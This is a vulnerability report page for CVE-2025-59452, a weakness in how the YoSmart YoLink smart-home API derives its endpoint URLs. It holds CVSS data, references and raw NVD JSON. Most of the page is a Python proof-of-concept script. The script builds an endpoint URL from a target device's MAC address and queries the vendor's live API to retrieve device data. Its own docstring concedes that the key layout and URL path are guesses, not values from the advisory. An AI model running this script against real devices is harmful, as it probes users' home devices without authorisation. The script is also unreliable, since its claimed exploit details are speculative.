Security Vulnerability Report
CVE-2025-59452

Published: 2025-10-06 20:15:37
Last Modified: 2026-04-15 00:35:42

Description

The YoSmart YoLink API through 2025-10-02 uses an endpoint URL that is derived from a device's MAC address along with an MD5 hash of non-secret information, such as a key that begins with cf50.

CVSS Details

CVSS Score: 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Weakness: CWE-340

Configurations (Affected Products)

YoSmart YoLink API <= 2025-10-02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-59452 - YoSmart YoLink API Endpoint URL Prediction PoC

This PoC demonstrates how to predict the YoLink API endpoint URL based on
the device's MAC address and the known MD5 hash key prefix.

Note: the CVE description only states that the endpoint URL is derived from
the device MAC address plus an MD5 hash of non-secret data (a key beginning
with "cf50"). The exact key layout and URL path used below are the PoC
author's assumptions, not values taken from the vendor advisory.
"""
import hashlib
import re
import sys

import requests


def generate_endpoint_url(mac_address, key_prefix="cf50"):
    """
    Generate the predicted YoLink API endpoint URL using the MAC address
    and the known non-secret key prefix.
    """
    # Normalize MAC address format (strip separators, lowercase hex)
    mac_clean = mac_address.replace(":", "").replace("-", "").lower()
    # Construct the key using the known prefix (assumed layout)
    key = key_prefix + mac_clean
    # Generate MD5 hash of the key; every input here is observable, so
    # anyone who knows the MAC can reproduce the hash (CWE-340)
    md5_hash = hashlib.md5(key.encode()).hexdigest()
    # Construct the endpoint URL based on the hash and MAC (assumed path)
    endpoint = f"https://api.yosmart.com/device/{md5_hash[:16]}/{mac_clean}"
    return endpoint


def validate_endpoint(url):
    """
    Validate if the predicted endpoint is accessible.
    Returns (True, body) on HTTP 200, otherwise (False, reason-or-None).
    """
    try:
        response = requests.get(url, timeout=10, verify=True)
        if response.status_code == 200:
            try:
                return True, response.json()
            except ValueError:
                # Body was not JSON; return the raw text instead
                return True, response.text
        return False, None
    except requests.exceptions.RequestException as e:
        return False, str(e)


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2025_59452.py <MAC_ADDRESS>")
        print("Example: python3 cve_2025_59452.py AA:BB:CC:DD:EE:FF")
        sys.exit(1)
    mac_address = sys.argv[1]
    # Validate MAC address format (six hex octets separated by ':' or '-')
    if not re.match(r"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$", mac_address):
        print("[!] Invalid MAC address format")
        sys.exit(1)
    print(f"[*] Target MAC Address: {mac_address}")
    # Generate the predicted endpoint URL
    endpoint_url = generate_endpoint_url(mac_address)
    print(f"[*] Predicted Endpoint URL: {endpoint_url}")
    # Attempt to access the endpoint
    print("[*] Attempting to access the endpoint...")
    success, data = validate_endpoint(endpoint_url)
    if success:
        print("[+] Endpoint is accessible!")
        print(f"[+] Response Data: {data}")
    else:
        print("[-] Endpoint is not accessible or returned an error")


if __name__ == "__main__":
    main()

References

https://bishopfox.com/blog/advisories
https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home
https://shop.yosmart.com/pages/product-support
https://shop.yosmart.com/pages/sa-2025-001

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59452", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink API through 2025-10-02 uses an endpoint URL that is derived from a device's MAC address along with an MD5 hash of non-secret information, such as a key that begins with cf50."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-340"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/sa-2025-001", "source": "[email protected]"}]}}